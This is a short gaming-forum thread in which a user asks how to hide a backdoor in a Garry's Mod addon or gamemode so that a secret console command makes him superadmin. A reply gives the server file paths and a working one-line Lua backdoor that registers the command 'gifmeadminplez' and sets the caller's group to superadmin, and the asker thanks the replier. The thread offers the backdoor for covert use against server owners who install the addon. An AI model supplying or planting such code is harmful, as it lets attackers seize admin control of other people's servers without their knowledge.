Thread: Backdoor

Results 1 to 5 of 5
  1. #1
    dewboat's Avatar
    Join Date
    Jul 2013
    Gender
    male
    Location
    sweden.sqf
    Posts
    65
    Reputation
    18
    Thanks
    10
    My Mood
    Cheerful

    Backdoor

    Hey, im not a coder so i dont really know anything about coding gamemodes and stuff. PLEASE dont post shit like - Omg noob learn lua instead or shit like that. I just want an easy reply thats tell me how to do it.

    So i was just wondering if i want to example put a backdoor inside an addon or gamemode. Where do i put it and what do i put in it
    Ive searched around on google but i cant really find anything.

    So if anyone knows how to put a backdoor in an addon/gamemode that gives me superadmin ( you type like "gifmeadminplez" in console and it automatticly makes you superadmin )

    please reply where i put the code and what code i should put in the file
    My Vouch Thread https://www.mpgh.net/forum/showthread.php?t=794531

    Maybe give me a thanks?

  2. #2
    suchisgood's Avatar
    Join Date
    Feb 2014
    Gender
    female
    Posts
    902
    Reputation
    10
    Thanks
    559
    My Mood
    Angelic
    lua/autorun/server/init.lua

    or

    gamemode/init.lua

    concommand.Add("gifmeadminplez", function(p) p:SetUserGroup("superadmin") end)

  3. The Following User Says Thank You to suchisgood For This Useful Post:

    dewboat (05-30-2014)

  4. #3
    dewboat's Avatar
    Join Date
    Jul 2013
    Gender
    male
    Location
    sweden.sqf
    Posts
    65
    Reputation
    18
    Thanks
    10
    My Mood
    Cheerful
    Thanks so much
    My Vouch Thread https://www.mpgh.net/forum/showthread.php?t=794531

    Maybe give me a thanks?

  5. #4
    I am a man's Avatar
    Join Date
    May 2014
    Gender
    female
    Posts
    23
    Reputation
    10
    Thanks
    10
    My Mood
    Brooding
    Omg noob learn lua instead

  6. #5
    dewboat's Avatar
    Join Date
    Jul 2013
    Gender
    male
    Location
    sweden.sqf
    Posts
    65
    Reputation
    18
    Thanks
    10
    My Mood
    Cheerful
    Luv u 2 <3
    My Vouch Thread https://www.mpgh.net/forum/showthread.php?t=794531

    Maybe give me a thanks?

Similar Threads

  1. Replies: 33
    Last Post: 08-02-2008, 11:05 AM
  2. WARNING A HACK ON MPGH.NET HAS A BACKDOOR
    By wrasia in forum WarRock - International Hacks
    Replies: 37
    Last Post: 11-20-2007, 11:24 AM
  3. [realse] BACKDOOR TROJAN V1!
    By ~claw~ in forum WarRock - International Hacks
    Replies: 5
    Last Post: 07-20-2007, 05:56 AM
  4. GooGle BacKdooR
    By RebornAce in forum General
    Replies: 17
    Last Post: 02-07-2006, 04:23 PM
  5. GooGle FiReFoX bAckdOoR
    By RebornAce in forum General
    Replies: 8
    Last Post: 02-04-2006, 05:38 PM